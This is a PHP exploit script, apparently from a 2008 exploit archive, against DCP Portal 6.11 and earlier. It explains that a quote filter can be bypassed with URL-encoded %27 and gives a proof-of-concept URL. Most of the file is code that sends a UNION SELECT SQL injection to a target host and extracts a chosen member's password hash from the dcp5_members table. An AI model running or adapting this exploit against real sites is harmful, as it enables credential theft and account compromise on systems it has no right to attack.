dcpportal-sql.txt
Posted on 07 January 2008
#!/usr/bin/php -q <?php echo "[*]DCP Portal <= 6.11 Remote SQL Injection Exploit "; echo "[*]Coded by x0kster -x0kster[AT]gmail[DOT]com - "; /* Note : Magic Quotes = 0 Script Download : http://www.dcp-portal.org/ Bug in index.php : <?php //index.php [...] 60. $sql = "SELECT id, name FROM $t_cats WHERE cat_id = '".$_GET["cid"]."' ORDER BY sort, name"; [...] ?> But the script filter the quotes with this code, included in each page of the cms: <?php //config/config.inc.php [...] 118. if (strlen($_SERVER['QUERY_STRING']) > 0) { 119. $str = $_SERVER['QUERY_STRING']; 120. $arr = split('[;&]', URLdecode($str)); 121. $pos = strpos($str, "'"); 122. if ($pos) { 123. $hackattempt = true; } [...] ?> But we can bypass this control using %27 instead ' :-). So this is the simple PoC: http://site/path/index.php?cid=-1%27+union+select+1,password+from+dcp5_members+where+uid=1/* Exploit : */ if ($argc<4) { echo "[*]Usage: php ".$argv[0]." host path id "; echo "[*]Example: "; echo "[*]php ".$argv[0]." localhost /dcp-portal/ 1 "; die; } function get_response($packet){ global $host, $response; $socket=fsockopen(gethostbyname($host),80); if (!$socket) { echo "[-]Error contacting $host. "; exit();} fputs($socket,$packet); $response=''; while (!feof($socket)) { $response.=fgets($socket); } fclose($socket); } $host =$argv[1]; $path =$argv[2]; $id = $argv[3]; $packet ="GET ".$path."index.php?cid=-1%27+union+select+1,concat(0x78306b73746572,password,0x78306b73746572)+from+dcp5_members+where+uid=".$id."/*"; $packet.="Host: ".$host." "; $packet.="Connection: Close "; get_response($packet); if(strstr($response,"x0kster")){ $hash = explode("x0kster",$response,32); echo "[+]Ok, the hash is : $hash[1] "; die; }else{ echo "[-]Exploit filed, maybe fixed or incorrect id. "; die; } ?>
